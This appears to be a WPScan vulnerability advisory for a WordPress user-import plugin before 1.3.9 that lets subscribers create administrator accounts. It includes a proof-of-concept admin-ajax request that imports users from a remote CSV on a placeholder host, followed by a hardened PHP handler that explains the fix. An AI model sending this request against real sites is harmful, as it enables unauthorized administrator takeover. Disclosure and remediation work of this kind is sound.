wpvulndb | Chloe Chamberland | WPVDB-ID: B7C5E0F3-3D29-49CE-B93E-FCAE6B6E62A6
History: Mar 11, 2020 - 12:00 a.m.

Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation

2020-03-11 00:00:00
Chloe Chamberland
wpscan.com

EPSS: 0.001 (Low) | Percentile: 44.1%

“The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users” providing subscriber-level users and above with the ability to escalate their privileges.

PoC

POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step=3 HTTP/1.1
Host: EXAMPLE.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Origin: http://EXAMPLE.com
Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: {SUB+ COOKIES}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

action=user_csv_import_request&file=http://REMOTESITE.com/USERS.csv&start_pos=0&end_pos=

PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU
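The request above reaches the plugin through the `user_csv_import_request` AJAX action, which WordPress routes to the `wp_ajax_user_csv_import_request` hook for any logged-in user. The following is an added example of what a hardened handler for that action looks like; it is not the plugin's own code or its 1.3.9 fix, and the function name, nonce action name and CSV column names are assumptions made for illustration. It shows the three controls whose absence produces the reported behaviour: a capability check so that subscriber-level accounts are refused, a nonce check, and a refusal to fetch the CSV from a caller-supplied URL or to assign a role the importer could not assign directly.

```php
<?php
// Added example (not the plugin's code): a hardened admin-ajax handler for the
// "user_csv_import_request" action. Hook name follows WordPress's wp_ajax_{action}
// convention; everything else (function names, nonce name, CSV columns) is assumed.

add_action( 'wp_ajax_user_csv_import_request', 'hardened_user_csv_import_request' );

function hardened_user_csv_import_request() {
    // 1. Capability check. Only users who may create accounts may import them.
    //    wp_send_json_error() calls wp_die(), so execution stops here on failure.
    if ( ! current_user_can( 'create_users' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 2. Nonce check (assumed nonce action name) so the request cannot be
    //    forged cross-site even for a legitimately privileged user.
    check_ajax_referer( 'hardened_user_csv_import', 'nonce' );

    // 3. Never fetch the CSV from a URL supplied in the request. Accept only a
    //    file name inside this site's uploads directory, resolved with realpath
    //    so "../" and symlinks cannot escape it.
    $file    = isset( $_POST['file'] ) ? sanitize_text_field( wp_unslash( $_POST['file'] ) ) : '';
    $uploads = wp_upload_dir();
    $base    = realpath( $uploads['basedir'] );
    $path    = realpath( $uploads['basedir'] . '/' . basename( $file ) );
    if ( false === $base || false === $path || 0 !== strpos( $path, $base ) ) {
        wp_send_json_error( array( 'message' => 'Invalid import file.' ), 400 );
    }

    $start = isset( $_POST['start_pos'] ) ? absint( $_POST['start_pos'] ) : 0;
    $end   = isset( $_POST['end_pos'] ) ? absint( $_POST['end_pos'] ) : 0;

    // 4. A CSV row may only request a role the importing user is allowed to
    //    assign (get_editable_roles() respects the current user's capabilities);
    //    anything else is downgraded to subscriber.
    $editable = get_editable_roles();
    $created  = 0;
    foreach ( hardened_read_csv_rows( $path, $start, $end ) as $row ) {
        $role    = ( isset( $row['role'] ) && isset( $editable[ $row['role'] ] ) ) ? $row['role'] : 'subscriber';
        $user_id = wp_insert_user( array(
            'user_login' => sanitize_user( $row['user_login'] ),
            'user_email' => sanitize_email( $row['user_email'] ),
            'user_pass'  => wp_generate_password( 24 ), // imported users get a random password
            'role'       => $role,
        ) );
        if ( ! is_wp_error( $user_id ) ) {
            $created++;
        }
    }
    wp_send_json_success( array( 'created' => $created ) );
}

// Reads rows [$start, $end) of a CSV whose first line is a header row and
// returns them as associative arrays; $end of 0 means "to the end of file".
function hardened_read_csv_rows( $path, $start, $end ) {
    $rows = array();
    $fh   = fopen( $path, 'r' );
    if ( ! $fh ) {
        return $rows;
    }
    $header = fgetcsv( $fh );
    $i      = 0;
    while ( false !== ( $line = fgetcsv( $fh ) ) ) {
        if ( $i >= $start && ( 0 === $end || $i < $end ) && count( $line ) === count( $header ) ) {
            $rows[] = array_combine( $header, $line );
        }
        $i++;
    }
    fclose( $fh );
    return $rows;
}
```

The capability check is the control that directly addresses the advisory: with it in place, the PoC request sent with subscriber cookies receives a 403 before any file is read. The file-path restriction removes the remote-URL fetch entirely, and the role whitelist means that even a legitimate importer cannot create accounts more privileged than they could create through the normal Users screen.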

